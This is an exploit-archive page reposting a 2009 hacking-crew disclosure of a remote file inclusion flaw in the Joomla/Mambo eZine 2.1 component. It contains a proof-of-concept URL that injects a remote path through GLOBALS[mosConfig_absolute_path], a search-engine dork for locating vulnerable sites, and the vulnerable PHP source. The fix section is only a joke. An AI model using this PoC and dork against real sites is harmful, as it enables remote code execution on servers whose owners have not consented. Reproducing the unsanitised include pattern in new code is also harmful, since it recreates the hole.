exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla / Mambo Ezine Remote File Inclusion

Joomla / Mambo Ezine Remote File Inclusion
Posted Nov 18, 2009
Authored by kaMtiEz | Site indonesiancoder.com

The Joomla / Mambo Ezine component version 2.1 suffers from a remote file inclusion vulnerability.

tags | exploit, remote, code execution, file inclusion
SHA-256 | 64e128e7842dcece7bfeb3a3c1c62129f99a25bd02e4949442ecae7ddec3654e

Joomla / Mambo Ezine Remote File Inclusion

Change Mirror Download
#####################################################################################################
## Joomla / Mambo Component com_ezine Remote File Include vulnerability ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : October 20 2009 ##
#####################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#####################################################################################################

[ Software Information ]

[+] Vendor : http://designformamb0.c0m
[+] Download : -
[+] version : 2.1
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_ezine"
[+] Location : INDONESIA

[DESCRIPTION]

/**
* eZine component v2.1
*
* @copyright Nguyen Manh Cuong
* Author`s email : cu0ngnm@designformamb0.c0m
* Author`s hompage : http://designformamb0.c0m
*
* @license Commercial Product - Single Site License or Free to Use with Limitation
**/

###############################################

[ PoC ]

http://127.0.0.1/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]

[ Bugs File ]

[+] d4m_ajax_pagenav.php

<?php
// Extend mosPageNav class
require_once( $GLOBALS['mosConfig_absolute_path'] . '/includes/pageNavigation.php' );
// Define new Page Navigation class
class ajaxPageNav extends mosPageNav {
// Rewrite writePagesLinks() function to build ajax friendly URL
function writeAjaxLinks( $link ) {
$txt = '';

$displayed_pages = 10;
$total_pages = ceil( $this->total / $this->limit );
$this_page = ceil( ($this->limitstart+1) / $this->limit );
$start_loop = (floor(($this_page-1)/$displayed_pages))*$displayed_pages+1;
if ($start_loop + $displayed_pages - 1 < $total_pages) {
$stop_loop = $start_loop + $displayed_pages - 1;
} else {
$stop_loop = $total_pages;
}

if ($this_page > 1) {
$page = ($this_page - 2) * $this->limit;
$txt .= '<a href="'. str_replace('%LIMITSTART%', 0, $link) .'" class="pagenav" title="first page"><< '. _PN_START .'</a> ';
$txt .= '<a href="'. str_replace('%LIMITSTART%', $page, $link) .'" class="pagenav" title="previous page">< '. _PN_PREVIOUS .'</a> ';
} else {
$txt .= '<span class="pagenav"><< '. _PN_START .'</span> ';
$txt .= '<span class="pagenav">< '. _PN_PREVIOUS .'</span> ';
}

for ($i=$start_loop; $i <= $stop_loop; $i++) {
$page = ($i - 1) * $this->limit;
if ($i == $this_page) {
$txt .= '<span class="pagenav">'. $i .'</span> ';
} else {
$txt .= '<a href="'. str_replace('%LIMITSTART%', $page, $link) .'" class="pagenav"><strong>'. $i .'</strong></a> ';
}
}

if ($this_page < $total_pages) {
$page = $this_page * $this->limit;
$end_page = ($total_pages-1) * $this->limit;
$txt .= '<a href="'. str_replace('%LIMITSTART%', $page, $link) .' " class="pagenav" title="next page">'. _PN_NEXT .' ></a> ';
$txt .= '<a href="'. str_replace('%LIMITSTART%', $end_page, $link) .' " class="pagenav" title="end page">'. _PN_END .' >></a>';
} else {
$txt .= '<span class="pagenav">'. _PN_NEXT .' ></span> ';
$txt .= '<span class="pagenav">'. _PN_END .' >></span>';
}
return $txt;
}
}
?>

[ FIX ]

Tukulesto said : talk to Aurakasih .. lol
kaMtiEz said : tanya ama AuraKasih .. hha
M3Nw5 said : takon Karo AuraKasih .. hha
Arianom Said : coba kau tanya aura kasih lae

Joke.. ;)
###############################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ]

[+] makasih buad babe and enyak .... muach .. untuk pacarkuwh luph u mwahhhhh
[+] makasih buat om tukulesto buat perl exploit nye .. huahhh
[+] aurakasih .. sekarang pilih antara kaMtiEz . Tukulesto . M3NW5 ... hha
[+] om tukulesto kutunggu kau di kotaku .. :D
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close